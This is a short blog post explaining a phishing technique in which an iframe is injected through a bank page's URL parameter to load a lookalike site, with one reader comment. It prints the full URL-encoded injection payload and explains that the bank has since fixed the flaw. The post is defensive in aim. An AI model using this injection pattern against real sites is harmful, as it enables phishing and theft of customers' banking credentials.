A new phishing exploit

I’ve run across a new phishing exploit–new to me, anyhow. This one is especially pernicious because it actually uses a legitimate bank’s website against itself.

Take a good look at the following URL:

http://www.charterone.com/ legalcenter/do_not_solicit_confirm.asp? name=%3Ciframe+ style%3D%22top%3A120%3B+ left%3A0%3B+ position%3Aabsolute%3B%22+ FRAMEBORDER%3D%220%22+ BORDER%3D%220%22+ width%3D900+ height%3D650+ src%3D%22http%3A%2F%2Fwww.totallyfreebanking.biz%22%

I’ve broken it up and highlighted the salient portions in red. I’ll break down what is happening here. Apparently, Charter One uses (or used–see below) a frame-based interface where the contents of a frame could be specified through the URL. What the scammer has done is set up a mimic site (www.totallyfreebanking.biz) that looks like Charter One’s, and loads in a frame of Charter One’s, but isn’t a part of it, and send the phished data back to the scammer. So even a person who is generally aware of phishing scams might look at this URL and say “Oh, it really is from my bank, it has their URL, it must be OK.”

I visited the page in question, and Charter One seems to have defeated this already.

I don’t want this to be a “frames are bad” rant, because I do think frames have their uses. And in fact, using URLs to specify frame contents goes a long way towards addressing the problem of frame-addressability. But anyone who can’t afford to have an outside party insert content into a frame needs something more subtle–perhaps a javascript detector in the framing page to prevent outside pages appearing in a frame.

1 thought on “A new phishing exploit”

  1. I received what was obviously a phishing attempt for eBay the other day. As in your case, the site appeared to be legit, signin.ebay.com, but it was clearly bogus (“you must confirm your password” blah blah blah). I deleted it without analyzing it, now wish I hadn’t. Perhaps it was the same technique.

    BTW and related to scams, check out this hilarious story about an attempted scam, revolving around a PowerBook on eBay, that was foiled–with the would-be scammer out $500 plus. Sometimes there is justice in the world.


Comments are closed.